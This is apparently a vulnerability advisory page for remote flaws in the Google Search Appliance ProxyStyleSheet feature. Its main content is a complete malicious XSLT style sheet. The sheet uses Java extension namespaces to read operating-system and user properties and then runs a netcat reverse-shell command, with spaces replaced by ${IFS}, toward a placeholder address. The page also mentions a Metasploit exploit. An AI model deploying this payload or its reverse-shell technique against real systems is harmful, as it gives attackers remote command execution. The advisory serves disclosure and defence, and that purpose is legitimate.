|
|
Google Search Appliance ProxyStyleSheet Multiple Remote Vulnerabilities
An exploit is not required to leverage these issues. An example style sheet sufficient to execute commands has been provided: <xsl:template name="my_page_footer" xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System" xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime" > <!-- Google Mini XSLT Code Execution [metasploit] --> XSLT Version: <xsl:value-of select="system-property('xsl:version')"/> <br /> XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br /> XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> <br /> OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br /> Version: <xsl:value-of select="sys:getProperty('os.version')" /> <br /> Arch: <xsl:value-of select="sys:getProperty('os.arch')" /> <br /> UserName: <xsl:value-of select="sys:getProperty('user.name')" /> <br /> UserHome: <xsl:value-of select="sys:getProperty('user.home')" /> <br /> UserDir: <xsl:value-of select="sys:getProperty('user.dir')" /> <br /> Executing command...<br /> <xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" /> </span> </xsl:template> An exploit for the Metasploit Framework is also available: |
|
Privacy Statement |